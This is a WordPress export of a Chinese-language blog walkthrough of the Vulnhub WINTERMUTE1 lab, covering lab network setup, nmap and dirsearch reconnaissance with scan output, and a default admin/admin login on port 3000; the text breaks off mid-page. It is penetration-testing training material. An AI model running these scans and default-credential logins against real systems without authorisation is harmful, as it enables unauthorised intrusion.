{"id":391,"date":"2024-03-14T18:49:56","date_gmt":"2024-03-14T10:49:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=391"},"modified":"2024-03-14T18:50:20","modified_gmt":"2024-03-14T10:50:20","slug":"vulnhub-wintermute1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/391\/03\/14\/2024\/","title":{"rendered":"Vulnhub&#8211;WINTERMUTE1"},"content":{"rendered":"<h1>WINTERMUTE1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849243.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849243.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302231216321\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u914d\u7f6e\u9776\u573a<\/h2>\n<p>\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u6709\u4e2a\u5b89\u88c5\u5411\u5bfc\uff1a<\/p>\n<pre><code class=\"language-text\">Wintermute Vitrual Box Setup Guide\n\nThis lab makes use of pivoting, so the VirtualBox networks need to be setup correctly. It&#039;s quick and easy with all dynamic ips.\nrun or Import each machine into Virtual Box ( File &gt;&gt; Import Applicance )\n\n---------------------------------------------------------------------------------------------------------------------------\n\nSTRAYLIGHT (Network #1 &amp; #2)\n-This is the first machine to get root. Setup to be dual-homed\/2 NIC&#039;s.\n-Adapter 1 \n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #1\n    Advanced (we want 2 NIC&#039;s, each on a separate network)\n    - Adapter Type - Intel PRO\/1000 T Server \n-Adapter 2\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #2\n    Advanced\n    - Adapter Type - Intel PRO\/1000 MT Desktop (or other adapter type different than network #1).\n\n---------------------------------------------------------------------------------------------------------------------------\n\nNEUROMANCER (Network #2)\n-This is the final machine to get root. Setup to have 1 network. Only accessed via Straylight, using Host-Only Eth adapter #2.\n-Adapter 1\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #2\n    Advanced\n    - Adapter Type - Intel PRO\/1000 MT Desktop\n\n---------------------------------------------------------------------------------------------------------------------------\n\nKALI (Network #1)\n- Your attacking machine should only be setup on the Host-Only adpater Straylight is on...and NAT if you choose.\n- You should not be able to ping Neuromancer from your Kali box. If you can, you are cheating.\n- Adapter 1\n    - Host-only Adapter\n    - VirtualBox Host-Only Ethernet Adapter #1\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849247.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849247.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302234750727\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849248.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240302234807426\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo nmap -sn -v 192.168.244.0\/24<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849249.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849249.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303000906897\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h1>straylight<\/h1>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<p>\u4e0d\u77e5\u9053\u5bf9\u4e0d\u5bf9\uff0c\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u76f8\u5173\u7684\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">nmap -p- -sV -Pn -T5 -v -A --script=vuln 192.168.244.130<\/code><\/pre>\n<ul>\n<li><code>-Pn<\/code>: \u4e0d\u8fdb\u884c\u4e3b\u673a\u53d1\u73b0\uff0c\u5047\u8bbe\u76ee\u6807\u4e3b\u673a\u662f\u5728\u7ebf\u7684\u3002\u5728\u626b\u63cf\u4e4b\u524d\uff0c\u4e0d\u53d1\u9001Ping\u5305\u3002<\/li>\n<li><code>-T5<\/code>: \u8bbe\u7f6e\u626b\u63cf\u901f\u5ea6\u3002<code>-T5<\/code>\u8868\u793a\u4f7f\u7528\u6700\u5feb\u7684\u626b\u63cf\u901f\u5ea6\uff0c\u4f46\u4e5f\u53ef\u80fd\u589e\u52a0\u88ab\u68c0\u6d4b\u5230\u7684\u98ce\u9669\u3002<\/li>\n<li><code>-v<\/code>: \u542f\u7528\u8be6\u7ec6\u8f93\u51fa\u6a21\u5f0f\uff0c\u663e\u793a\u626b\u63cf\u8fc7\u7a0b\u4e2d\u7684\u8be6\u7ec6\u4fe1\u606f\u3002<\/li>\n<li><code>-A<\/code>: \u542f\u7528\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u3001\u7248\u672c\u68c0\u6d4b\u3001\u811a\u672c\u626b\u63cf\u548ctraceroute\u529f\u80fd\uff0c\u63d0\u4f9b\u66f4\u5168\u9762\u7684\u4fe1\u606f\u3002<\/li>\n<li><code>--script=vuln<\/code>: \u8fd0\u884c\u6f0f\u6d1e\u626b\u63cf\u811a\u672c\u3002\u8fd9\u4f1a\u5c1d\u8bd5\u68c0\u6d4b\u76ee\u6807\u4e3b\u673a\u4e0a\u53ef\u80fd\u5b58\u5728\u7684\u6f0f\u6d1e\u3002<\/li>\n<\/ul>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-02 11:08 EST\nNSE: Loaded 150 scripts for scanning.\nNSE: Script Pre-scanning.\nInitiating NSE at 11:08\nCompleted NSE at 11:08, 10.07s elapsed\nInitiating NSE at 11:08\nCompleted NSE at 11:08, 0.00s elapsed\nInitiating Parallel DNS resolution of 1 host. at 11:08\nCompleted Parallel DNS resolution of 1 host. at 11:08, 0.01s elapsed\nInitiating Connect Scan at 11:08\nScanning 192.168.244.130 [65535 ports]\nDiscovered open port 80\/tcp on 192.168.244.130\nDiscovered open port 25\/tcp on 192.168.244.130\nDiscovered open port 3000\/tcp on 192.168.244.130\nCompleted Connect Scan at 11:08, 11.34s elapsed (65535 total ports)\nInitiating Service scan at 11:08\nScanning 3 services on 192.168.244.130\nCompleted Service scan at 11:08, 6.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.244.130.\nInitiating NSE at 11:08\nNSE: [firewall-bypass] lacks privileges.\nCompleted NSE at 11:09, 59.07s elapsed\nInitiating NSE at 11:09\nNSE: [tls-ticketbleed] Not running due to lack of privileges.\nCompleted NSE at 11:09, 1.12s elapsed\nNmap scan report for 192.168.244.130\nHost is up (0.0017s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n25\/tcp   open  smtp    Postfix smtpd\n| smtp-vuln-cve2010-4344: \n|_  The SMTP server is not Exim: NOT VULNERABLE\n| ssl-dh-params: \n|   VULNERABLE:\n|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability\n|     State: VULNERABLE\n|       Transport Layer Security (TLS) services that use anonymous\n|       Diffie-Hellman key exchange only provide protection against passive\n|       eavesdropping, and are vulnerable to active man-in-the-middle attacks\n|       which could completely compromise the confidentiality and integrity\n|       of any data exchanged over the resulting session.\n|     Check results:\n|       ANONYMOUS DH GROUP 1\n|             Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA\n|             Modulus Type: Safe prime\n|             Modulus Source: Unknown\/Custom-generated\n|             Modulus Length: 2048\n|             Generator Length: 8\n|             Public Key Length: 2048\n|     References:\n|_      https:\/\/www.ietf.org\/rfc\/rfc2246.txt\n80\/tcp   open  http    Apache httpd 2.4.25 ((Debian))\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|_  \/manual\/: Potentially interesting folder\n|_http-server-header: Apache\/2.4.25 (Debian)\n3000\/tcp open  http    Mongoose httpd\n| http-fileupload-exploiter: \n|   \n|_    Couldn&#039;t find a file-type field.\n| http-vuln-cve2010-0738: \n|_  \/jmx-console\/: Authentication was not required\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-slowloris-check: \n|   VULNERABLE:\n|   Slowloris DOS attack\n|     State: LIKELY VULNERABLE\n|     IDs:  CVE:CVE-2007-6750\n|       Slowloris tries to keep many connections to the target web server open and hold\n|       them open as long as possible.  It accomplishes this by opening connections to\n|       the target web server and sending a partial request. By doing so, it starves\n|       the http server&#039;s resources causing Denial Of Service.\n|       \n|     Disclosure date: 2009-09-17\n|     References:\n|       http:\/\/ha.ckers.org\/slowloris\/\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2007-6750\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.244.130\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/192.168.244.130:3000\/\n|     Form id: \n|_    Form action: \/authorize.html\nService Info: Host:  straylight\n\nNSE: Script Post-scanning.\nInitiating NSE at 11:09\nCompleted NSE at 11:09, 0.00s elapsed\nInitiating NSE at 11:09\nCompleted NSE at 11:09, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 88.04 seconds<\/code><\/pre>\n<p>\u7701\u7565\u4e86\u4e00\u4e9b\u4fe1\u606f\uff0c\u4f46\u662f\u57fa\u672c\u53ef\u4ee5\u770b\u51fa\u6765\u626b\u51fa\u4e86\u4e09\u4e2a\u7aef\u53e3\uff0c\u5206\u522b\u662f<code>25<\/code>,<code>80<\/code>,<code>3000<\/code>\uff0c\u5c1d\u8bd5\u6253\u5f00\u770b\u4e00\u4e0b\u8fd9\u4e2a<code>80<\/code>\u7aef\u53e3\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849250.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849250.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303002715964\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849251.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849251.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303002812151\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>ok\u662f\u6b63\u786e\u7684\u9776\u573a\u3002<\/p>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/192.168.244.130 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 1000<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849252.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849252.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014002264\" \/><\/div><\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u51e0\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-qpl\">\/manual\n\/freeside\n:3000<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849253.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849253.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014402955\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849254.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849254.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014431239\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849255.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849255.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014605294\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u4e0a\u9762\u5199\u7684\u9ed8\u8ba4\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">admin<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849256.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849256.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014724724\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\uff01\uff01\uff01\uff01\u5230\u5904\u70b9\u70b9\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6211\u4eec\u53ef\u4ee5\u7528\u5230\u7684\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849257.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849257.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303014829202\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-apl\">\/turing-bolo<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849258.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849258.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015054985\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6709\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849259.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849259.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015142100\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849261.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015359761\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u65e5\u5fd7\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-apl\">molly.log\narmitage.log\nriviera.log<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849262.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849262.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015542198\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849263.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849263.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015617344\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849264.png'><img class=\"lazyload lazyload-style-2\" 